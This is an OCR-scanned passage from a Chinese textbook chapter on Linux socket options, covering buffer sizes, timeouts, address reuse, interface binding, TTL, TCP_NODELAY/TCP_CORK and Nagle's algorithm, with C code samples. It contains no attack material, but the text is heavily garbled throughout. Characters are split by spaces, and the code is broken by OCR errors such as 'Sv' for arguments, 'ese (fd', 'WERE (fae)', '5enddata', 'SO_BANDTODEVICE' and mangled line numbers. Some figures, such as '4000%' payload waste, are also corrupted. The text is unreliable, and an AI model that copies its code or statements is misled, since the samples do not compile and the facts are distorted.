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式 来 进行 ， 使 用 SO_OOBINLINE 可 以 设置 使 用 通用 方法 来 接收 带 外 数据 。 可 以 使 用 下 面 
的 代码 来 完成 此 项 功能 设置 。 


#define YES 1 /* 设 置 有 效 */ 
#define NO 0 /* 设 置 无 效 */ 
int ss /* 套 接 字 变量 */ 
int err; /* 错 误 值 */ 
int optval = YES; /* 设 置 选项 值 为 有 效 */ 
s = socket (AF INET, SOCK DGRAM,0); /+* 建 立 套 接 字 */ 
err = setsockopt( /* 设 置 选项 */ 
Sv 
SOL_SOCKET， 
SO_OOBINLINE, /*SO_OOBINLINE 选项 */ 
&optval, /* 值 为 有 效 */ 
sizeof (optval)); /* 值 的 长 度 */ 
if (err) /* 判 断 是 否 发 生 错 误 */ 
perror ("setsockopt"); /* 打 印 错误 信息 */ 


在 设置 选项 之 后 ， 带 外 数据 就 会 与 一 般 数据 一 起 接收 。 在 这 种 方式 下 ， 所 接收 的 越界 
数据 与 通常 数据 相同 ， 即 增加 了 带宽 。 


12.2.8 SO_RCVBUF 和 SO_SNDBUF 缓冲 区 大 小 选项 


选项 SO_RCVBUF 和 SO_SNDBUF 用 于 操作 发 送 缓冲 区 和 接收 缓冲 区 的 大 小 ， 对 于 
每 个 套 接 字 对 应 均 有 发 送 缓冲 区 和 接收 缓冲 区 。 接 收 缓冲 区 用 于 保存 网 络 协议 栈 收 到 的 数 
据 ， 直 到 应 用 程序 成 功 地 读 取 ;发 送 缓冲 区 则 需要 保存 发 送 的 数据 直到 发 送 成 功 。 

这 两 个 选项 在 TCP 连接 和 UDP 连接 中 的 含义 有 所 不 同 。 

在 UDP 连接 中 ， 由 于 它 是 无 状态 连接 ， 发 送 缓冲 区 在 数据 通过 网 络 设备 发 送 后 就 可 
以 丢弃 ， 不 用 保存 。 而 接收 缓冲 区 则 需要 保存 数据 直到 应 用 程序 读 取 ， 由 于 UDP 没有 流量 
控制 ， 当 缓冲 区 过 小 时 ， 发 送 端 局 部 时 间 内 会 产生 爆发 性 数据 传输 ， 由 于 接收 端 来 不 及 读 
取 数 据 ， 很 容易 造成 缓冲 区 溢出 ,将 原来 的 数据 覆盖 ,淹没 接收 端 。 因 此 ， 使 用 UDP 连接 
时 ， 需 要 将 接收 的 缓冲 区 调整 为 比较 大 的 值 。 

在 TCP 连接 中 ， 接 收 缓冲 区 大 小 就 是 滑动 窗口 大 小 。TCP 的 接收 缓冲 区 不 可 能 溢出 ， 
因为 不 允许 对 方 发 送 超过 接收 缓冲 区 大 小 的 数据 ， 当 对 方 发 送 的 数据 超过 滑动 窗口 大 小 ， 

设置 TCP 接收 缓冲 区 大 小 的 时 机 很 重要 ， 因 为 接收 缓冲 区 与 滑动 窗口 的 大 小 是 一 臻 
的 ， 而 滑动 窗口 的 协商 是 在 建立 连接 时 通过 SYN 获得 的 。 对 于 客户 端 程序 ， 接 收 缓冲 区 的 
大 小 要 在 connect0 函 数 调用 之 前 进行 设置 ， 因 为 connect() 需 要 通过 SYN 建立 连接 。 而 对 
于 服务 器 程序 ， 需 要 在 listen() 之 前 进行 设置 接收 缓冲 区 的 大 小 ， 因 为 accept0 返 回 的 套 接 
字 描 述 符 是 继承 了 listen() 的 描述 符 属性 ， 此 时 的 滑动 窗口 都 已 经 进行 了 设置 。 


12.2.9 SO_RCVLOWAT 和 SO_SNDLOWAT 缓冲 区 下 限 选项 


发 送 缓冲 区 下 限 选项 SO_RCVLOWAT 和 接收 缓冲 区 下 限 选项 SO_SNDLOWAT 用 来 调 
整 缓冲 区 的 下 限 值 。 函 数 select0 使 用 发 送 缓冲 区 下 限 和 接收 缓冲 区 下 限 来 判断 可 读 和 
可 写 。 
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口 当 select() 轮 询 可 读 的 时 候 ， 接 收 缓冲 区 中 的 数据 必须 达到 可 写 的 下 限 值 ，selectO 
才 返 回 。 对 于 TCP 和 UDP， 默 认 的 值 均 为 1， 即 接收 到 一 个 字 节 的 数据 select(O) 函 
数 就 可 以 返回 。 

口 当 select0 轮 询 可 写 的 时 候 ， 需 要 发 送 缓冲 区 中 的 空闲 空间 大 小 达到 下 限 值 时 ， 函 
数 才 返 回 。 对 于 TCP 通常 为 2048 个 字 节 。UDP 的 发 送 缓冲 区 的 可 用 空间 字 节 数 
从 不 发 生变 化 ， 为 发 送 缓冲 区 的 大 小 ， 因 此 只 要 UDP 套 接 字 发 送 的 数据 小 于 发 送 
缓冲 区 的 大 小 ， 就 总 是 可 以 发 送 的 。 


12.2.10 SO_RCVTIMEO 和 SO_SNDTIMEO 收发 超时 选项 


选项 SO_RCVTIMEO 表示 接收 数据 的 超时 时 间 ，SO_SNDTIMEO 表示 发 送 数据 的 超 
时 时 间 ， 默 认 情 况 下 在 接收 和 发 送 数据 的 时 候 是 不 会 超时 的 ， 例 如 recv0 函 数 当 没 有 数据 
的 时 候 会 永远 阻塞 。 这 两 个 选项 影响 到 的 函数 有 如 下 两 类 。 
口 接收 超时 影响 的 5 个 函数 为 : read()、readv()、recv()、recvfrom() 和 recvmsg()。 
口 发 送 超 时 影响 的 5 个 函数 为 : write()、writev()、send()、sendto() 和 sendmsg()。 
接收 超时 和 发 送 超时 的 功能 与 select() 的 超时 的 功能 有 部 分 是 一 致 的 , 不 过 使 用 套 接 字 
选项 进行 设置 后 ， 不 用 再 每 次 轮 询 ， 其 属性 会 一 直 继承 下 去 。 
超时 的 时 间 获 取 和 设置 通过 结构 struct timeval 的 变量 来 实现 。 结 构 struct timeval 定义 
如 下 : 
struct timeval { 
time 七 tv_sec; /* 秒 数 */ 
suseconds t tv usec; /* 微 秒 */ 


全 注意 : 设置 的 时 候 需 要 设置 timeval.tv_sec 和 timeval.tv_usec 两 个 值 ，tv_sec 表示 秒 值 ， 
tv_usec 表示 微 秒 值 。1 秒 为 1000000 微 秒 。 当 tv_sec 和 tv_usec 都 为 0 的 时 候 ， 
禁止 超时 ， 与 默认 的 设置 相同 。 


12.2.11 SO_REUSERADDR 地 址 重用 选项 


这 个 参数 表示 允许 重复 使 用 本 地 地 址 和 端口 ， 这 个 设置 在 服务 器 程序 中 经 常 使 用 。 
例如 ， 某 个 服务 器 进程 占用 了 TCP 的 80 端口 进行 侦 听 ， 当 再 次 在 此 端口 侦 听 时 会 返回 
错误 。 设置 SO_ REUSEADDR 可 以 解决 这 个 问题 ， 人 允许 共 用 这 个 端口 。 某 些 非 正常 退出 的 
服务 器 程序 ， 可 能 需要 占用 端口 一 段 时 间 才 能 允许 其 他 进程 使 用 ， 即 使 这 个 程序 已 经 死 掉 ， 
内 核 仍然 需要 一 段 时 间 才 能 释放 此 端口 ， 不 设置 SO_ REUSEADDR 将 不 能 正确 绑 定 端口 。 
设置 地 址 和 端口 复 用 的 代码 如 下 所 示 。 


#define YES 1 /* 设 置 有 效 */ 
#define NO 0 /*# 设 置 无 效 */ 

int s; /* 套 接 字 变 量 */ 

int err; /* 错 误 值 */ 

int optval = YES; /* 设 置 选项 值 为 有 效 */ 
s = socket (AF INET, SOCK DGRAM,0); /* 建 立 套 接 字 */ 
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err = Setsockopt ( /* 设 置 选项 */ 
Sr 
SOL SOCKET, 
SO_REUSEADDR, /*SO_REUSEADDR 选项 */ 
&optval, /* 值 为 有 效 */ 
sizeof (optval)); /* 值 的 长 度 */ 

if (err) /# 判 断 是 否 发 生 错 误 */ 
perror ("setsockopt"); /* 打 印 错误 信息 */ 


如 果 需 要 查询 端口 复 用 的 情况 ， 可 使 用 getsockopt() 函 数 。 
12.2.12 SO_EXCLUSIVEADDRUSE 端口 独占 选项 


与 SO_ REUSEADDR 相反 ，SO_EXCLUSIVEADDRUSE 选项 表示 以 独占 的 方式 使 用 
端口 ,不 允许 其 他 应 用 程序 占用 此 端口 ， 此 时 不 能 使 用 SO_REUSEADDR 来 共享 使 用 某 一 
个 端口 。 

选项 SO_REUSEADDR 可 以 对 一 个 端口 进行 多 重 绑 定 ， 如 果 没 有 使 用 选项 SO_ 
EXCLUSIVEADDRUSE ， 则 显 式 设 置 某 一 端口 的 不 可 绑 定 状态 ， 即 使 调用 SO_ 
REVSEADDR 的 用 户 权 限 低 ， 也 可 以 将 某 个 程序 的 端口 重新 绑 定 在 高 级 权限 的 端口 上 。 多 
个 进程 可 以 同时 绑 定 在 某 个 端口 上 , 这 是 一 个 非常 大 的 安全 隐患 ， 程 序 可 以 很 容易 被 监听 。 
如 果 不 想 让 程序 被 监听 ， 需 要 使 用 本 选项 进行 端口 不 可 绑 定 的 设置 。 

12.2.13 SO_TYPE 套 接 字 类 型 选项 

这 个 选项 用 于 设置 或 者 获得 套 接 字 的 类 型 ,例如 SOCK_STREAM 或 者 SOCK_DGRAM 
等 表示 套 接 字 类 型 的 数值 。 

这 个 套 接 字 选项 经 常用 在 忘记 套 接 字 类 型 或 者 不 知道 套 接 字 类 型 的 情况 。 例 如 ， 在 如 

下 的 代码 中 先 建立 一 个 TCP 套 接 字 ， 但 是 之 后 忘记 这 个 套 接 字 的 类 型 了 ， 可 以 使 用 
SO_TYPE 选项 获取 其 类 型 。 


s = socket (AF INET,SOCK STRERM, 0) ; /+* 建 立 一 个 TCP 套 接 字 */ 


/* 忘 记 套 接 字 类 型 . . .*/ 


int type; 

int length = 4; 

err = getsockopt ( /* 获 得 套 接 字 选项 的 值 */ 
Sv 
SOL SOCKET, 
SO TYPE, /*SO TYPE 选项 */ 
&type, /#+ 套 接 字 类 型 */ 
& length); /* 值 的 长 度 */ 


if(SOCK STREAM == type) 
printf ("TCP 套 接 字 \n"); 

else if(SOCK DGRAM == type) 
printf ("UDP 套 接 字 ]n"); 


12.2.14 SO_BSDCOMPAT 与 BSD 套 接 字 兼 容 选项 


选项 SO_BSDCOMPAT 表示 是 否 与 BSD 套 接 字 兼 容 。 目 前 这 个 选项 存在 一 些 安全 漏 
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洞 ， 如 果 没 有 特殊 的 原因 不 要 使 用 这 个 选项 。 
例如 ， 在 Linux 内 核 的 net/core/sock.c 文件 中 ， 获 得 套 接 字 选项 的 sock_getsockoptO) 函 


数 中 ， 如 果 设 置 了 SO_BSDCOMPAT 选项 的 话 ， 其 中 的 参数 会 被 错误 初始 化 ， 并 将 值 返 区 
给 调用 的 用 户 ， 导 致 信息 泄漏 。 


12.2.15 SO_BINDTODEVICE 套 接 字 网 络 接口 绑 定 选 项 


套 接 字 选项 SO_BINDTODEVICE 可 以 将 套 接 字 与 某 个 网 络 设备 绑 定 ， 这 在 同一 个 主 
机 上 存在 多 个 网 络 设备 的 情况 十 分 有 用 ， 使 用 这 种 方法 ， 可 以 将 某 些 数据 显 式 地 指定 从 哪 
个 网 络 设备 发 送 。 

如 图 12.4 所 示 ， 一 个 主机 上 有 两 个 网 卡 eth0 和 eth1， 建 立 了 两 个 套 接 字 s0 和 s1，s0 
的 数据 需要 和 子 网 0 中 的 主机 进行 数据 通信 ， 而 sl 需要 和 子 网 1 中 的 主机 进行 数据 通信 ， 
而 子 网 0 和 子 网 1 是 不 相连 通 的 。 

在 实际 情况 中 经 常 出 现 如 下 的 情况 , 如 图 12.5 所 示 , 套 接 字 s0 的 数据 发 送 到 了 子 网 1 
中 ， 这 在 实际 使 用 中 造成 了 很 大 的 困扰 。 


套 接 字 s0 eth0 套 接 字 s0 k = 中 eth0 
pe 
/ 
\ 


/ \ 
在 接 字 sl ET 


— 


子 网 1 子 网 1 
图 12.4 正常 的 数据 收发 结构 图 12.5 混乱 的 数据 收发 结构 


使 用 套 接 字 选项 SO_BINDTODEVICE 可 以 解决 上 面 的 问题 ， 将 s0 的 数据 收发 绑 定 到 
eth0 上 ， 将 sl 的 数据 收发 绑 定 到 ethl 上 。 

此 选项 的 值 是 一 个 表示 设备 名 称 的 字符 串 ， 当 为 空 字符 串 时 ， 套 接 字 绑 定 到 序号 为 0 
的 网 络 设备 上 。 当 字符 串 是 一 个 正确 的 网 络 设备 名 称 时 ， 则 会 绑 定 到 此 设备 上 。 如 下 面 代 
码 将 套 接 字 s 绑 定 到 网 卡 ethl 上 。 

Ea /* 绑 定 的 网 卡 名 称 */ 


struct ifreq if ethl; /* 绑 定 网 卡 的 结构 */ 
strncpy (if eth]l.ifr name, ifname, IFNAMSIZ); 


/* 将 网 卡 名 称 放 到 结构 成 员 ifr name 中 */ 
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err= Setsockopt (s，SOL_SOCKET，SO_BANDTODEVICE，(char *) &if ethl, sizeof (if_ 
eth1)); 
/* 将 s 绑 定 到 网 卡 ethl 上 */ 
if(err){ /* 失 败 */ 
printf ("setsockopt SO BANDTODEVICE failureNn") 
| 


绑 定 成 功 之 后 ， 通 过 s 进行 的 数据 收发 将 由 网 卡 ethl 处 理 。 
12.2.16 SO_PRIORITY 套 接 字 优先 级 选项 


套 接 字 选 项 SO_PRIORITY 设置 通过 此 套 接 字 进行 发 送 的 报 文 的 优先 级 ， 由 于 Linux 
中 发 送 报 文 队列 的 排队 规则 是 高 优先 级 的 数据 优先 被 处 理 ， 因 此 设置 这 个 选项 可 以 调整 套 
接 字 的 优先 级 。 

这 个 值 通过 optval 来 设置 ， 优 先 级 的 范围 是 0 一 6 (包含 优先 级 0 和 优先 级 6)。 下 面 
的 代码 将 套 接 字 s 的 优先 级 设置 为 6。 


opt = 6; 
setsockopt (5， SOL SOCKET, SO PRIORITY, &opt, sizeof (opt)); 


12.3 ”IPPROTO IP 选项 


IPPROTO _IP 级 别 的 套 接 字 选 项 主要 是 IP 层 协议 的 操作 。 主 要 包含 控制 IP 头 部 选项 
的 IP_HDRINCL、IP 头 部 选项 信息 可 控 的 IP_OPTIONS、 服 务 类 型 设置 的 人 _TOS、IP 包 
的 生存 时 间 设 置 的 IP_TTL 等 选项 控制 命令 字 。 


12.3.1 IP_HDRINCL 选项 


- 般 情况 下 ，Linux 内 核 会 自动 计算 和 填充 IP 头 部 数据 。 如 果 套 接 字 是 一 个 原始 套 接 
字 ， 设 置 此 选项 有 效 之 后 ， 则 IP 头 部 需要 用 户 手 动 填充 。 用 户 在 发 送 数据 的 时 候 需 要 手动 
填充 IP 的 头 部 信息 ， 这 个 选项 通常 是 在 需要 用 户 自 定义 数据 包 格式 的 时 候 使 用 。 

使 用 此 选项 需要 注意 的 是 , 一旦 设置 此 选项 生效 , 用 户 发 送 的 了 P 数据 包 将 不 再 进行 分 
片 。 因 此 ， 用 户 的 数据 包 不 能 太 大 ， 否 则 网 卡 不 能 进行 发 送 ， 会 造成 数据 发 送 失 败 。 
12.3.2 IP_OPTNIOS 选项 

此 选项 允许 设置 下 头 部 的 选项 信息 ， 在 发 送 数据 的 时 候 会 按照 用 户 设置 的 卫 选项 进 
行 。 进行 IP_OPTIONS 选项 设置 的 时 候 , 其 参数 是 指向 选项 设置 信息 的 指针 和 选项 的 长 度 ， 
选项 长 度 最 大 为 40 个 字 节 。 

在 TCP 连接 中 ， 当 进行 连接 时 ， 如 果 连 接 信息 中 包含 卫 选项 设置 ， 则 选项 会 自动 设 
置 为 路 由 器 包含 的 设置 信息 。 在 连接 过 程 中 ， 传 入 包 中 不 能 对 这 个 选项 进行 更 改 。 
12.3.3 IP_TOS 选项 

服务 类 型 选项 可 以 设置 或 者 获取 服务 类 型 的 值 。 对 于 发 送 的 数据 可 以 将 服务 类 型 设置 
为 如 表 12.2 所 示 的 值 ， 在 文件 <netinet/ip.h> 中 有 定义 。 
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值 含 义 
IPTOS LOWDELAY 表示 最 小 延迟 IPTOS _ RELIABILITY 表示 最 大 可 靠 性 
IPTOS THROUGHPUT 表示 最 大 吞吐 量 IPTOS LOWCOST 表示 最 小 成 本 


全 注意 ; 选项 IP_TOS 可 以 设置 或 者 获取 发 送 服务 器 类 型 的 选项 ， 但 是 不 能 获得 接收 数据 
的 服务 类 型 值 。 


12.3.4 IP_TTL 选项 


生存 时 间 选 项 ， 使 用 此 选项 可 以 设置 或 者 获得 发 送 报 文 的 TTL 值 。 一 般 情 况 下 值 为 
64， 对 于 原始 套 接 字 此 值 为 255。 

设置 IP 的 生存 时 间 值 ， 可 以 调整 网 络 数据 的 发 送 速 度 。 例 如 ， 通 过 一 个 TCP 连接 发 
送 数 据 ， 如 果 TTL 的 值 过 大 ， 就 有 各 种 路 由 方法 可 选 。 调 整 TCP 的 TTL 值 之 后 ， 比 较 长 
的 路 由 路 径 会 被 取消 。 

下 面 的 代码 用 32 跳 的 TTL 发 送 数 据 后 ， 将 套 接 字 的 TTL 值 还 原 。 


int current TTL=0; /* 用 于 保存 当前 的 TTL*/ 
int set TTL=32; /* 设 置 的 TTL 值 */ 

int length TTL=sizeof (int); 

/* 获 取 当 前 的 TTL 值 */ 


getsockopt (s, IPPROTO _ IP,IP_ TTL, &current TTL,&length TTL); 

/* 设 置 新 的 TTL 值 */ 

setsockopt (s, IPPROTO IP,IP_ TTL, &set ttl, length TTL); 

/* 给 远程 主机 发 送 数据 */ 

sendtol(s,buffer,buffer len,0, (struct sockaddr*) gremote ip,sizeof(struct 
sockaddr) ); 

/* 还 原 TTL 值 */ 

setsockopt (s, IPPROTO _IP,IP_ TTL,&current TTL, length TTL); 


人 注意 ; 与 P_TOS 一 样 ，IP_TTL 选项 不 能 获得 接收 报 文 的 生存 时 间 值 。 
12.4 IPPROTO TCP 选项 


IPPROTO_TCP 级 别 的 套 接 字 选项 是 对 TCP 层 的 操作 。 主要 包括 控制 TCP 生存 时 间 的 
TCP_KEEPALIVE、 最 大 重 传 时 间 的 TCP_MAXRT、 最 大 分 节 大 小 的 TCP_MAXSEG、 屏 
蔽 nagle 算法 的 TCP_NODELAY 和 TCP_CORE。 


12.4.1 TCP_KEEPALIVE 选项 


TCP_KEEPALIVE 选项 用 于 获取 或 者 设置 存活 探测 的 时 间 间 隔 ， 在 SO_KEEPALIVE 
设置 的 情况 下 ， 此 选项 才 有 效 。 默 认 情 况 下 ， 存 活 时 间 的 值 为 7200s， 即 两 个 小 时 系统 进 
行 一 次 存活 时 间 探 测 。 下 面 的 代码 将 TCP 的 存活 时 间 设 置 为 60s。 

int alive time = 60; /* 设 置 存活 时 间 为 60s*/ 
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int length alive=sizeof (int); 

int s = socket (AF INET,SOCK STREAM,0); /* 建 立 一 个 TCP 套 接 字 */ 

/* 设 置 新 的 存活 时 间 值 为 60 秒 */ 

setsockopt (s, IPPROTO TCP, TCP KEEPALIVE, &alive time, length alive); 


12.4.2 TCP_MAXRT 选项 


最 大 重 传 时 间 ， 表 示 在 连接 断 开 之 前 重 传 需要 经 过 的 时 间 。 此 数值 以 秒 为 单位 ，0 表 
示 系 统 默认 值 ，-1 表示 永远 重 传 。 下 面 的 代码 将 系统 的 最 大 重 传 时 间 设 置 为 3 秒 钟 ， 如 果 
一 个 TCP 报 文 在 3 秒 钟 之 内 没有 收 到 回复 ， 则 会 进行 数据 的 重 传 。 


int maxrt = 3; /* 设 置 最 大 重 传 时 间 为 3s*/ 
int length maxrt =sizeof (int); 

int s = socket (AF INET,SOCK STREAM,0); /* 建 立 一 个 TCP 套 接 字 */ 
/* 设 置 新 的 最 大 重 传 时 间 值 为 3s*/ 


setsockopt (s, IPPROTO TCP, TCP MAXRT, &maxrt, length alive); 


12.4.3 TCP_MAXSEG 选项 


使 用 此 选项 可 以 获取 或 设置 TCP 连接 的 最 大 分 节 大 小 (MSS)。 返 回 值 是 TCP 连接 中 
向 另 一 端 发 送 的 最 大 数据 大 小 ， 它 通常 使 用 SYN 与 另 一 端 协 商 MSS，MSS 值 的 设置 选择 
-者 之 间 的 最 小 值 。 


12.4.4 TCP_NODELAY 和 TCP_CORK 选项 
TCP NODELAY 和 TCP_CORK 这 两 个 选项 是 针对 Nagle 算法 的 关闭 而 设置 的 。 
1. Nagle 算法 简介 


Nagle 算法 是 由 John Nagle 发 明 的 。 他 在 1984 年 使 用 这 种 方法 为 当时 的 福特 汽车 公司 
解决 网 络 阻塞 问题 ， 即 所 谓 的 silly window syndrome。 例 如 ， 一 个 终端 应 用 程序 的 每 次 按 
键 都 要 发 送 到 服务 器 上 ， 这 样 一 个 包 只 有 一 个 字 节 的 有 用 数据 和 40 个 字 节 的 包头 ， 即 有 
4000% 负 载 浪费 掉 了 , 当 系 统 资源 有 限时 , 很 容易 造成 网 络 的 阻塞 和 系统 的 性 能 下 降 。 Nagle 
算法 将 上 述 情 况 的 终端 输入 包装 为 更 大 的 帧 来 发 送 ， 可 以 有 效 地 解决 上 述 问 题 。 
Nagle 算法 的 基本 原理 有 如 下 两 点 : 
口 将 小 分 组 包装 为 更 大 的 帧 进行 发 送 , 例如 上 述 情况 终端 的 多 次 输入 一 起 打包 发 送 ， 
而 不 是 每 输入 一 次 发 送 一 次 数据 。Nagle 算法 总 是 最 大 可 能 地 发 送 最 大 分 组 ， 将 小 
分 组 包装 ， 小 分 组 是 指 小 于 MSS 的 分 组 。 在 之 前 的 数据 被 确认 之 前 不 再 发 送 数据 
分 组 ， 即 Nagle 算法 需要 之 前 数据 接收 方 的 响应 。 
口 Nagle 算法 通常 在 接收 端 使 用 延迟 确认 ,在 接收 到 数据 后 并 不 马上 发 送 确认 ， 而 是 
要 等 待 一 小 段 时 间 。 这 样 可 以 与 接收 方 的 有 效 数 据 一 起 发 送 ACK， 即 接收 方向 发 
送 方 发 送 的 确认 分 组 中 包含 接收 方 发 送 给 发 送 方 的 有 效 载荷 数据 。 

2. Nagle 算法 的 例子 

例如 ， 一 个 telnet 的 客户 端 和 服务 器 连接 ， 客 户 端 按键 的 输入 间隔 为 200ms， 而 网 络 
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传输 和 返回 的 时 间 为 500ms， 客 户 端 输入 date 命令 ， 则 不 使 用 Nagle 算法 的 执行 过 程 如 


图 12.6 所 示 。 
客户 端的 date 字符 


输入 t， 在 第 600ms 输入 e。 而 网 络 传输 和 响应 过 程 由 于 每 次 只 能 发 送 一 个 小 的 分 组 ， 并 且 


输入 的 顺序 为 在 第 0ms 输入 d， 在 第 200ms 输入 a， 在 第 400ms 


必须 等 待 分 组 响应 返回 后 才能 发 送 第 二 个 分 组 ， 所 以 在 第 500ms，d 字符 的 响应 返回 ; 第 
1000ms，a 字符 的 响应 返回 ;第 1500ms，t 字符 的 响应 返回 ， 第 2000ms，e 字符 的 响应 


返回 。 


这 种 过 程 不 能 充分 地 使 用 网 络 的 带宽 ， 因 为 在 发 送 a 字符 的 时 候 缓冲 区 中 已经 有 字符 


d 了 ， 却 不 进行 发 送 。 


Nagle 算法 充分 利用 了 将 小 包 合并 的 功能 ， 


x 


如 图 12.7 所 示 。 在 第 500ms 发 送 第 二 个 包 


的 时 候 ， 此 时 客户 端 已 经 有 at 两 个 字符 ， 此 时 将 其 一 起 发 出 。 


客户 端 服务 器 端 
d 0 一 
a 200 “ee 
a0 We 
600 | 


1800 


图 12.6 不 使 用 Nagle 算法 的 交互 过 程 


客户 端 服务 器 端 


1200 


图 12.7 使 用 Nagle 算法 的 交互 过 程 


3. 选项 TCP_NODELAY 和 TCP_CORK 在 Nagle 算法 中 的 作用 


目前 ，Nagle 算法 已 经 是 网 络 协议 栈 的 默认 配置 ， 它 可 以 有 效 地 提高 网 络 的 有 效 负载 。 
但 是 在 某 些 情况 下 却 可 能 不 符合 需求 。 
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当 需 要 根据 Nagle 算法 的 第 三 条 禁止 时 , 使 用 TCP NODELAY 选项 设置 。 此 时 客户 端 
的 请 求 不 需要 和 其 他 分 组 合并 ， 会 尽快 地 发 送 到 服务 器 端 ， 可 以 提高 交互 性 应 用 程序 的 响 
应 速度 。 


另外 一 种 使 用 TCP_CORK 选项 的 情况 是 需要 等 到 发 送 的 数据 量 达 到 最 大 时 ， 一 次 性 
地 发 送 全 部 数据 ， 这 样 可 以 充分 地 利用 网 络 的 带宽 ， 提 高 数据 传输 的 通信 性 能 。 

例如 ， 对 于 一 个 应 用 场景 ， 需 要 先 写 入 一 个 标志 字符 ， 然 后 写 入 数据 ， 最 后 一 起 发 送 。 
这 种 情况 在 文件 传输 或 者 大 数据 传输 中 经 常用 到 。 如 果 使 用 Nagle 优化 ， 则 会 在 标志 字符 
写 入 的 时 候 发 送 一 个 字符 ， 造 成 了 浪费 。 此 时 可 以 设置 TCP_CORK,， 告 诉 协议 栈 在 达到 最 
大 数据 分 组 的 时 候 一 起 发 送 。 这 种 情况 就 像 一 个 接 水 的 水 桶 ， 当 水 接 满 的 时 候 才 一 次 性 地 
将 水 桶 拿 走 使 用 。 

intfd, cork = 1; 

/* 初 给 化 */ 

ese (fd, SOL TCP, TCP CORK, &cork, sizeof (cork)); 

/* 设 置 TCP_CORK 选项 */ 


write (Ed /* 用 水 桶 接 水 */ 
senddata (fd, ...); /* 拿 走 水 桶 */ 
Se /* 其 他 处 理 */ 
WERE (fae) /* 用 水 桶 接 水 */ 
5enddata (fd; 。.) 2 /* 拿 走 水 桶 */ 
cork = 0; 


setsockopt (fd, SOL_ TCP, TCP CORK, &cork, sizeof (on)); 
/* 取 消 设 置 TCP_CORK 选项 */ 


Apache 的 HTTPD 使 用 了 TCP_NODELAY 来 发 送 大 块 的 数据 ， 用 于 提高 性 能 。 
12.5 使 用 套 接 字 选项 
本 节 将 用 几 个 例子 来 说 明 对 如 何 使 用 套 接 字 选 项 进行 程序 设计 ， 主 要 包含 设置 和 获得 
缓冲 区 的 大 小 、 获 取 套 接 字 的 类 型 、 设 置 套 接 字 的 读 取 超 时 时 间 等 。 
12.5.1 设置 和 获取 缓冲 区 大 小 


本 节 将 对 设置 和 获取 缓冲 区 大 小 的 程序 设计 进行 介绍 ， 给 出 一 段 代 码 读 取 缓 冲 区 大 小 
设置 的 情况 ， 然 后 设置 缓冲 区 大 小 ， 再 读 取 修 改 缓冲 区 后 缓冲 区 的 大 小 。 


1. 缓冲 区 选项 使 用 方法 
读 取 缓 冲 区 大 小 使 用 类 似 下 面 的 代码 : 


optlen = sizeof (buff size) 7 
err = getsockopt (s, SOL SOCKET, SO_SNDBUF/#SO RCVBUF*/, &snd size,&optlen); 


设置 缓冲 区 大 小 使 用 类 似 下 面 的 代码 : 
buff size = 4096; 
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optlen = sizeof (buff size); 
err= setsockopt (s, SOL SOCKET, SO_SNDBUF/#SO RCVBUF*/, & buff size, optlen); 


在 程序 设计 的 时 候 经 常 需要 考虑 性 能 ， 当 发 送 或 者 接收 的 数据 比较 小 ， 而 计算 负载 又 
比较 重 的 时 候 ， 经 常 将 缓冲 区 的 大 小 设置 为 比较 小 的 值 ， 以 节省 资源 。 

当 处 理 的 数据 量 比较 大 ， 例 如 接收 实时 流 媒 体 ， 则 可 以 将 缓冲 区 设置 得 比较 大 ， 将 接 
收 过程 和 解码 过 程 进行 分 离 。 


2. 缓冲 区 选项 使 用 的 例子 


本 例 中 建立 一 个 TCP 套 接 字 ， 先 查看 系统 默认 的 接收 缓冲 区 和 发 送 缓冲 区 的 大 小 ， 然 
后 修改 接收 缓冲 区 和 发 送 缓冲 的 大 小 ， 最 后 将 修改 后 的 结果 打印 出 来 。 

(1) 默认 TCP 缓冲 区 的 大 小 设置 。 先 建立 一 个 TCP 套 接 字 s， 使 用 函数 getsockopt0 
的 选项 SO_SNDBU 获得 发 送 缓冲 区 的 大 小 ， 使 用 选项 SO_RCVBUF 获得 接收 缓冲 区 的 大 
小 。 获 得 的 数值 分 别 保存 在 snd_size 和 rcv_size 变量 中 ， 并 将 这 两 个 值 打印 出 来 。 


01 #include <stdio.h> 

02 #include <stdlib.h> 

03 #include <unistd.h> 

04 #include <string.h> 

05 #include <errno.h> 

06 #include <sys/types.h> 

07 #include <sys/socket.h> 

08 #include <assert.h> 

09 int main(int argc,char **argv) 


Qi 

ET int err = -1; /* 返 回 值 */ 

12 ri El i /*socket 描述 符 */ 
13 int snd size = 0; /* 发 送 缓冲 区 大 小 */ 
14 int zcv size = 0; /* 接 收 缓冲 区 大 小 */ 
he: socklen t optlen; /* 选 项 值 长 度 */ 

16 | 

nl * 建立 一 个 TCP 套 接 字 

18 i 

19 Ss = socket (PF_INET,SOCK STREAM,0); 

20 ES = =){ 

21 printf ("建立 套 接 字 错 误 \n"); 

22 return -1; 

23 } 

24 

25 TA 

26 * 先 读 取 缓冲 区 设置 的 情况 

2 * 获得 原始 发 送 缓冲 区 大 小 

28 二 

29 optlen = sizeof(snd size); 

30 err = getsockopt(s, SOL SOCKET, SO_SNDBUF,&snd size, &optlen); 
3 if(err){ 

Ek printf ("获取 发 送 缓冲 区 大 小 错误 \n") ; 

ic] } 

34 Ves 

SG * 打印 原始 缓冲 区 设置 情况 

36 区 

37 Printf(" 发 送 缓冲 区 原始 大 小 为 : sd 字 节 \n", snd size); 

38 printf ("接收 缓冲 区 原始 大 小 为 : sq 字 节 \n",rcv_size); 

39 js 
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* 获得 原始 接收 缓冲 区 大 小 
中 


optlen = sizeof(rcv size); 
err = getsockopt(s, SOL SOCKET, SO RCVBUF, &rcv size, &optlen); 
if(err){ 
printf ("获取 接收 缓冲 区 大 小 错误 \n"); 
E 


(2) 修改 缓冲 区 大 小 。 调 用 函数 setsockopt0 的 选项 SO_SNDBUF 设置 发 送 缓冲 区 的 大 
小 为 8192， 使 用 选项 SO_RCVBUF 设置 接收 缓冲 区 的 大 小 为 4096。 


/* 

* 设置 发 送 缓冲 区 大 小 

/| 

snd size = 4096; /* 发 送 缓冲 区 大 小 为 4K*/ 


optlen = sizeof(snd size); 
err = setsockopt(s, SOL SOCKET, SO SNDBUF, &snd size, optlen); 
if (err){ 


printf ("设置 发 送 缓冲 区 大 小 错误 \n"); 


J 


/* 
* 设置 接收 缓冲 区 大 小 
rcv_size = 8192; /* 接 收 缓冲 区 大 小 为 8K*/ 


optlen = sizeof(rcv size); 
err = setsockopt(s,SOL SOCKET,SO RCVBUF, g&rcv size, optlen); 
if(err){ 
printf ("设置 接收 缓冲 区 大 小 错误 \n")， 
} 


(3) 检查 缓冲 区 修改 情况 。 检 查 修改 后 的 缓冲 区 大 小 情况 ， 重 新 获得 接收 绥 冲 区 大 小 
